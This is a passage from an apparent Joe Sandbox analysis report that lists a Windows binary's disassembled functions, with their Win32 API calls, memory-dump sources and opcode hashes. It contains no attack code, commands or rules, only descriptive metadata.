                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                          • String ID:
                                          • API String ID: 1592001646-0
                                          • Opcode ID: dba0d55ccba0aaa211415d03495aa3ee3d0f557ea974e5f158b0ca3f21f72511
                                          • Instruction ID: a8581ba0c74e7e47cedb82923b4e3e9bff9cbd6b5fe0a3ad20cdd7a3b2490f82
                                          • Opcode Fuzzy Hash: dba0d55ccba0aaa211415d03495aa3ee3d0f557ea974e5f158b0ca3f21f72511
                                          • Instruction Fuzzy Hash: 15218931E41109EFDF00DFA4C945BEEB7B8EF89348F184499E441BB241E730AA49CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EC), ref: 00ED280A
                                          • SetWindowLongW.USER32 ref: 00ED2824
                                          • SetWindowLongW.USER32 ref: 00ED2832
                                          • SetLayeredWindowAttributes.USER32 ref: 00ED2840
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Long$AttributesLayered
                                          • String ID:
                                          • API String ID: 2169480361-0
                                          • Opcode ID: 3dbd81b2739378c329c37e85c5c5b8f3a48459b842d55eceb68ebff4e460638d
                                          • Instruction ID: fc424cb0a44a6c89ea2019a5e362aa31ad4059bb799d4213c33426f16b4ba5b8
                                          • Opcode Fuzzy Hash: 3dbd81b2739378c329c37e85c5c5b8f3a48459b842d55eceb68ebff4e460638d
                                          • Instruction Fuzzy Hash: D6213335205111AFD7149B24D840FAA7B9AEF95324F24924EF526AB3E2C771FC43C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EA8D7D: lstrlenW.KERNEL32 ref: 00EA8D8C
                                            • Part of subcall function 00EA8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00EA8DB2
                                            • Part of subcall function 00EA8D7D: lstrcmpiW.KERNEL32 ref: 00EA8DE3
                                          • lstrlenW.KERNEL32 ref: 00EA7923
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00EA7949
                                          • lstrcmpiW.KERNEL32 ref: 00EA7984
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen
                                          • String ID: cdecl
                                          • API String ID: 4031866154-3896280584
                                          • Opcode ID: a4488862428b507721a39d3a53210cfd8174cb6c64ed36b7c920041820b20769
                                          • Instruction ID: 279e2aa856d7fc945494959a697949fcb21b8fe905f86b0adcddd466422e6562
                                          • Opcode Fuzzy Hash: a4488862428b507721a39d3a53210cfd8174cb6c64ed36b7c920041820b20769
                                          • Instruction Fuzzy Hash: 4411E43A201202AFCB159F35DC45D7B77E9EF8A394B10502BE982DB2A4EB31A811C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 00ED56BB
                                          • _wcslen.LIBCMT ref: 00ED56CD
                                          • _wcslen.LIBCMT ref: 00ED56D8
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00ED5816
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend_wcslen
                                          • String ID:
                                          • API String ID: 455545452-0
                                          • Opcode ID: 7d9cb05c3cb832c347efa68f8263423dd266ba43598b0bf44f5b77cf597a5089
                                          • Instruction ID: b7acd16da99bc6ebd977b3b96b9d3852be27e150291961c4a55df286e678c647
                                          • Opcode Fuzzy Hash: 7d9cb05c3cb832c347efa68f8263423dd266ba43598b0bf44f5b77cf597a5089
                                          • Instruction Fuzzy Hash: 98110A7264060996DB209F65DC81AFE37ACEF50764B10502BF926F6281E770C985CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00EAE1FD
                                          • MessageBoxW.USER32 ref: 00EAE230
                                          • WaitForSingleObject.KERNEL32 ref: 00EAE246
                                          • CloseHandle.KERNEL32(00000000), ref: 00EAE24D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 2880819207-0
                                          • Opcode ID: daab476b080271b19e84f4b78fb21165fb82e7e694a57adb30fb0f96f2c8aea7
                                          • Instruction ID: cc0bad06e8bedfe9b91f018a894be50991c3ab03f2c24aa2224c502481f8a2e0
                                          • Opcode Fuzzy Hash: daab476b080271b19e84f4b78fb21165fb82e7e694a57adb30fb0f96f2c8aea7
                                          • Instruction Fuzzy Hash: 26110872905259BFC7019BA8AC09BDE7FACEB46354F108256F924F7391D270DD0487B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E6D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNEL32(00000000,?,00E6CFF9,00000000,00000004,00000000), ref: 00E6D218
                                          • GetLastError.KERNEL32 ref: 00E6D224
                                          • __dosmaperr.LIBCMT ref: 00E6D22B
                                          • ResumeThread.KERNEL32(00000000), ref: 00E6D249
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                          • String ID:
                                          • API String ID: 173952441-0
                                          • Opcode ID: b9713357dc2122f9a249756cdb567051a06fc89f159c10703d9309f5ddfc67f6
                                          • Instruction ID: 25677885a85a2323275547d7ea8a58aa67dfd9b2f949a518af8ae0217eabd9e0
                                          • Opcode Fuzzy Hash: b9713357dc2122f9a249756cdb567051a06fc89f159c10703d9309f5ddfc67f6
                                          • Instruction Fuzzy Hash: FF012636E8A204BBC7115BA5FC05BAA3BA9DF813B0F205219F924B20E0CB70C901C6A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E4600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateWindowExW.USER32 ref: 00E4604C
                                          • GetStockObject.GDI32 ref: 00E46060
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4606A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateMessageObjectSendStockWindow
                                          • String ID:
                                          • API String ID: 3970641297-0
                                          • Opcode ID: b5783e0ad905217875550319bbf3773a7ea60fdde8e1b1d815613e0f9b47a3e3
                                          • Instruction ID: 26ec6ad9f68e3d952e3173739283a7e85fe79b4d4a87dcdc620ab66ff31fcb3e
                                          • Opcode Fuzzy Hash: b5783e0ad905217875550319bbf3773a7ea60fdde8e1b1d815613e0f9b47a3e3
                                          • Instruction Fuzzy Hash: 7711C4B2502509BFEF224FA4EC44EEABB6DFF09395F101202FA1466010C732DC60DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32 ref: 00EA747F
                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00EA7497
                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00EA74AC
                                          • RegisterTypeLibForUser.OLEAUT32 ref: 00EA74CA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Type$Register$FileLoadModuleNameUser
                                          • String ID:
                                          • API String ID: 1352324309-0
                                          • Opcode ID: 73cbb7f5b7c73d900c3724f7ff855f85503c0259e9532d6da9eee2723a46f5e2
                                          • Instruction ID: f7a3ad06131a26305a65de4f042a9f83841bd3fab32c458103c6da9a377d1b83
                                          • Opcode Fuzzy Hash: 73cbb7f5b7c73d900c3724f7ff855f85503c0259e9532d6da9eee2723a46f5e2
                                          • Instruction Fuzzy Hash: 6B11A1B12063119FE720CF14ED08BD27FFCEB09B44F10856AA6A6EA151D770F908DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00EAACD3,?,00008000), ref: 00EAB0C4
                                          • Sleep.KERNEL32(00000000), ref: 00EAB0E9
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00EAACD3,?,00008000), ref: 00EAB0F3
                                          • Sleep.KERNEL32(00000000), ref: 00EAB126
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          • Opcode ID: db4eac699b7c557d7d5379b3c93bcba3455a4bcbd9dbe1a281a4817f4fc5f85d
                                          • Instruction ID: 333d21db13c06685dd44166d9491f9d835b7f99c6eab77e5ba312c8bdac7f1fb
                                          • Opcode Fuzzy Hash: db4eac699b7c557d7d5379b3c93bcba3455a4bcbd9dbe1a281a4817f4fc5f85d
                                          • Instruction Fuzzy Hash: 20118B30C0252DEBCF04AFE5E9A86EEBB78FF1E311F105096D981B6282CB306650CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00EA2DC5
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA2DD6
                                          • GetCurrentThreadId.KERNEL32 ref: 00EA2DDD
                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 00EA2DE4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                          • String ID:
                                          • API String ID: 2710830443-0
                                          • Opcode ID: 827055fed8b2548c5a5bb4220fa5203504b6e50d5d3464af7464e30e83e3556c
                                          • Instruction ID: 81001c7a6a29458d410d2c183386fd63c018ddbca9a45d26b4b5b471622a070f
                                          • Opcode Fuzzy Hash: 827055fed8b2548c5a5bb4220fa5203504b6e50d5d3464af7464e30e83e3556c
                                          • Instruction Fuzzy Hash: F9E06D711022257BDB201B67AC0DEEB3F6CEF47FA1F10101AB606F90819AA4D884C6B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E59639: ExtCreatePen.GDI32 ref: 00E59693
                                            • Part of subcall function 00E59639: SelectObject.GDI32 ref: 00E596A2
                                            • Part of subcall function 00E59639: BeginPath.GDI32 ref: 00E596B9
                                            • Part of subcall function 00E59639: SelectObject.GDI32 ref: 00E596E2
                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00ED8887
                                          • LineTo.GDI32(?,?,?), ref: 00ED8894
                                          • EndPath.GDI32 ref: 00ED88A4
                                          • StrokePath.GDI32(?), ref: 00ED88B2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                          • String ID:
                                          • API String ID: 1539411459-0
                                          • Opcode ID: 3d0c14fd00eb59fc1fff8cdb5bcbc90c7f6c9e2ae5db48f7d6bae67647f96211
                                          • Instruction ID: 135e4c0c619938c97b6be694ba8098f23fb721e73ff772a6e48790f53c55cf30
                                          • Opcode Fuzzy Hash: 3d0c14fd00eb59fc1fff8cdb5bcbc90c7f6c9e2ae5db48f7d6bae67647f96211
                                          • Instruction Fuzzy Hash: 1CF09A36002259FADB121F95AC09FCE3B69AF06310F508002FA11710E2C7B51515DBE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E598B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Color$ModeObjectStockText
                                          • String ID:
                                          • API String ID: 4037423528-0
                                          • Opcode ID: b9b6f4387e5de3d0ff1cfc0aefef34a35ffebd8f815b4059762c6b01ff9f77ae
                                          • Instruction ID: d2ec47e0fc8a638f9833a677932d183443f589799a7b41c3affb7d25300d2a30
                                          • Opcode Fuzzy Hash: b9b6f4387e5de3d0ff1cfc0aefef34a35ffebd8f815b4059762c6b01ff9f77ae
                                          • Instruction Fuzzy Hash: F8E06531245251AEDF215B75BC09BD83F21EB11376F14821AF6F9640E1C3714648DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          • Opcode ID: 024cfddb878e58993d49d6bc6d1b636aa0ab3c93b2e1259137531a040df79714
                                          • Instruction ID: a0776455a6acb6ca12f7a12047889efb78c4d13742cfebd2696ccd48d49421bd
                                          • Opcode Fuzzy Hash: 024cfddb878e58993d49d6bc6d1b636aa0ab3c93b2e1259137531a040df79714
                                          • Instruction Fuzzy Hash: 4CE04F316022129FD7201BA2AE0DB463B68EF457E5F244849F245E9090E6245449C750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E9D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00E9D858
                                          • GetDC.USER32(00000000), ref: 00E9D862
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E9D882
                                          • ReleaseDC.USER32(?), ref: 00E9D8A3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 0ba61739e30bf54ddca0fd94e7f75f8560201a895a6ea3eb94bbaaadebc57e12
                                          • Instruction ID: ba4352ae397a10076e9d6489bbf4645241e754a13a9961ca606127c2e1bf5a3b
                                          • Opcode Fuzzy Hash: 0ba61739e30bf54ddca0fd94e7f75f8560201a895a6ea3eb94bbaaadebc57e12
                                          • Instruction Fuzzy Hash: 26E01AB0805206DFCF519FA1EC0866DBBF2FB08751F28A40AE816F7250C738890AEF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E9D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00E9D86C
                                          • GetDC.USER32(00000000), ref: 00E9D876
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E9D882
                                          • ReleaseDC.USER32(?), ref: 00E9D8A3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 30260d566edd4a357adb12f796ef747985aa59350e96cf38c2f9f74232d18c27
                                          • Instruction ID: b75b238e1c4f6b84fc62bbbfc64e731d555d32cb06f5444c90130940517ea50b
                                          • Opcode Fuzzy Hash: 30260d566edd4a357adb12f796ef747985aa59350e96cf38c2f9f74232d18c27
                                          • Instruction Fuzzy Hash: 58E01A70801201DFCB509FA1E80866DBBF1FB08751B28940AE816F7250C738990ADF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E47620: _wcslen.LIBCMT ref: 00E47625
                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00EB4ED4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Connection_wcslen
                                          • String ID: *$LPT
                                          • API String ID: 1725874428-3443410124
                                          • Opcode ID: a65b79be135a615da97c76e8b8430cd9da335fd9c41bf773d2a3d30ab4d4d514
                                          • Instruction ID: cfd71b008700ca13c39de1f7ec06447231271cfcd75a61f94c1e6ed5c412b3f2
                                          • Opcode Fuzzy Hash: a65b79be135a615da97c76e8b8430cd9da335fd9c41bf773d2a3d30ab4d4d514
                                          • Instruction Fuzzy Hash: F69142B5A002149FCB14DF54C484EEABBF5BF44308F19A099E84AAF3A2D735ED45CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E6E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                          Download Yara Rule
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00E6E30D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
